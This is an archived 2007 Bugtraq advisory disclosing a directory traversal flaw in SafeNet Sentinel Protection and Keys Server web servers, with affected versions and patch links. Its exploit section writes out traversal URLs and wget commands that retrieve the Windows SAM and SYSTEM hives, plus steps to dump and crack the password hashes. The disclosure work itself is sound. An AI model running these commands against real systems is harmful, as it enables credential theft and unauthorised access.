lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071126210611.GI16342@conch.unet.brandeis.edu>
Date: Mon, 26 Nov 2007 16:06:11 -0500
From: Elliot Kendall <ekendall@...ndeis.edu>
To: bugtraq@...urityfocus.com
Subject: Directory Traversal in SafeNet Sentinel Protection Server and Keys Server

SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not santize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
================

2007-11-26  original release

-- 
Elliot Kendall <ekendall@...ndeis.edu>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/

Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (2232 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ